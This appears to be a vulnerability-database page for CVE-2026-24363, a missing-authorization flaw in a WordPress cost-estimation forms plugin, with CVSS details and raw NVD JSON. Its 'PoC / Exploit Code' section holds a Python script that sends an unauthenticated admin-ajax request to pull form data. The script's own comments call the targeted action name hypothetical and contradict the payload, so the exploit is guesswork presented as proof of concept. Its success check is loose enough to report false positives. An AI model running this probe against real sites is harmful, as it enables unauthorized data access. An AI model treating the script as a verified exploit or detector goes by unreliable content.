Security Vulnerability Report
中文
CVE-2026-24363 CVSS 7.5 HIGH

CVE-2026-24363

Published: 2026-03-25 17:16:37
Last Modified: 2026-04-24 16:32:54

Description

Missing Authorization vulnerability in loopus WP Cost Estimation & Payment Forms Builder WP_Estimation_Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cost Estimation & Payment Forms Builder: from n/a through < 10.3.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Cost Estimation & Payment Forms Builder < 10.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): """ Proof of Concept for CVE-2026-24363 Checks for missing authorization on sensitive endpoints. """ # The vulnerable endpoint is typically an AJAX action ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Example payload based on typical plugin structure # Specific action name 'lhf_save_form' is hypothetical for this CVE structure payload = { "action": "lhf_export_data", "id": "1" } try: response = requests.post(ajax_url, data=payload, timeout=10) # Check if response contains sensitive data or successful export indicators if response.status_code == 200 and ("form_data" in response.text or "success" in response.text): print(f"[+] Potential Vulnerability Detected at {target_url}") print(f"[+] Response: {response.text[:100]}...") else: print(f"[-] Target does not appear vulnerable or endpoint is inactive.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24363", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:37.110", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in loopus WP Cost Estimation & Payment Forms Builder WP_Estimation_Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cost Estimation & Payment Forms Builder: from n/a through < 10.3.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en loopus WP Cost Estimation &amp; Payment Forms Builder WP_Estimation_Form permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Cost Estimation &amp; Payment Forms Builder: desde n/a hasta &lt; 10.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/WP_Estimation_Form/vulnerability/wordpress-wp-cost-estimation-payment-forms-builder-plugin-10-3-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}